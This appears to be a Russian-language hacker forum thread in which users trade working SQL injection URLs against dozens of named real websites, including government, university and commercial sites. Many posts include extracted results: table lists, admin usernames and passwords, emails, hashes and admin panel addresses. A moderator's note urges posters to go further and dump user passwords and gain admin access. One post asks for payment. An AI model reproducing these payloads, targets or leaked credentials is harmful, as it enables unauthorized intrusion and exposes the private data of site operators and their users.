SQL Инъекции

blind, кажется

Code:

http://www.okolosport.ru/transfers/leagues/en_epl.php?tw_id=4&club_id=66+union+select+1,2,3,4,5,6,2,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47&lang=rus

 

Code:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18/*

prkgrkg@localhost:5.0.37-log

Code:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+limit+16,1/*

Code:

banner
group_membership
groups
keywords
krena
modify_diff
modify_mod_now
module_vars
news
news_category
or_news
perm_group
poll
poll_comment
poll_config
poll_data
poll_index
poll_ip
poll_log
poll_templates
poll_templateset
poll_user
pollip
pr_comments
pr_head
pr_news
pr_partners
pr_source
pr_titles
pr_user_online
reg_vars
session_info
sniffer_country
sniffer_hits
sniffer_hosts
sniffer_ip2c
sniffer_os
sniffer_point_out
sniffer_res_depth
sniffer_search_engines
sniffer_urls
sniffer_user_agent
structure_info
tbl_admlogins
tbl_admlogs
tbl_sessions
trigger_log
users
vars

-----------------
tbl_admlogins
-----------------

Code:

http://www.pr.kg/n/detail.php?id=-1+union+select+1,2,3,4,concat(pk_alId,char(58),alUserName,char(58),alPass,char(58),alEmail,char(58),alFName,char(58),alLName,char(58),alSecLevel,char(58),alDateJoined),6,7,8,9,10,11,12,13,14,15,16,17,18+from+tbl_admlogins+limit+0,1/*

3:askar:271983:[email protected]:Askar:Makeshov:2:10/02/05
6:jama:jama:jama@infotel:Джамиля:Мамшева:2:24/04/2007
7:pizdec:pizdec::haker::2:14/06/2007 - кто то свосем не давно побаловался)

http://www.pr.kg/n/adm - админка1
http://www.pr.kg/or/adm - админка2

 

http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SELECT+null,concat_ws(0x3a,admin_id,admin_password,admin_lastname)+from+admin/*

//там еще табличка products

///

тебе в тему 'просьбы о взломах'

 

HTML:

http://www.tppmo.ru/index.php?id=23'&page='+union+select+1,2,3,concat(username,char(58),password),5,6+from+admin/*

1:446df2be0c8667f2

http://www.tppmo.ru/admin/


_http://www.vaal.ru/show.php?id=1+union+select+1,2,3,4,5,6,7,8,version(),10,11/*

_http://www.k-gb.ru/object.php?id=4+union+select+version()/*

 

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.

Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок - получать пароли пользователей, доступ в админку. Это и интереснее и имеет хоть какой то смысл, в отличие от тупого выкладывания большого кол-ва инъекций.

При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.

Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.

 

com и edu.

Code:

http://www.firmmagazine.com/members/news.php?id=-702+union+select+1,version(),user(),4,5,6,7,database(),9,10,11/*
http://its.med.yale.edu/announcements/announce.php?id=-334+union+select+version(),2,user(),4,5,6,7,8,database()/*

 

http://host21.ru/index.php?id=-9+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+17,1/*

 

http://www.snezhny.com/autors.php?id=-284+UNION+SELECT+concat(id,char(58),name,char(58),pass,char(58),email),2,3,4,5,6,7,8,9+from+user+limit+3000,1/*

 

http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-9999+union+select+1,2,3,USER(),VERSION(),6,7,8,9,10,11,12/*

 

http://www.myminsk.com/catalog/info.php?id=-4255+union+select+1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11,12,13,14+from+information_schema.columns/*

http://webmoney.dn.ua/view.php?id=-33+union+select+1,VERSION(),3,4/*

 

вывод данных в левом верхнем углу
http://www.trubka.net/showarticle.php?id=-1083690272+union+select+1/*

http://www.sotovikm.ru/phone.php?ID=-4915+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12/*

 

http://www.sfpio-alsace.com/forum/philboard_forum.asp?forumid=-1+union+select+0,username,password,3,4,5,6,7,8,email,password,username,10,11,12,13,14,15,16,17,18+from+users

 

http://gonafish.com/index.php?id=-1+union+select+1,2,3,4,5,6/*

 

http://www.kadikoy.gov.tr/haberler.asp?ID=90+union+select+0,1,username,password,4,5,6,7+from+admin


С вас 40 турецких

 

http://www.zatulin.ru/index.php?section=news&id=239+and+1=0+UNION+SELECT+1,2,login,4,5+from+users/*

 

http://www.noev-kovcheg.ru/
mysql 5
названия таблиц и колонок

вывод без лимита.

 

91758 Result(s) Found

ППЦ , все на хотмыле или на аоле с мсм-ами... короч юзеров вагон неипаца!!))

Code:

http://www.newspaperads.com/usatoday/results.asp?subcatid=-1))%20union%20select%201,2,3,4,email,6,password,8,9,0,1%20from%20RegisteredUser--&interfaceid=&parent=&subcatname=&ddate=&count1=&count2=&count3=&count4=&count5=&count6=&website=usatoday&pubid=&searchtext=&orderby=&page=4584

 

http://www.nkrusa.org/news/daily_news.php?id=-1044+union+select+1,2,3,4,l_username,l_password+from+login/*

 

В самом низу!!!
http://www.number.ru/links/index.php?cat=-1+union+select+user,password,5,6,7,8,9+from+mysql.user/*

 

http://www.aoecs.org/news/list.php?type=11+union+select+1,2,user(),database(),5,6,7,8/*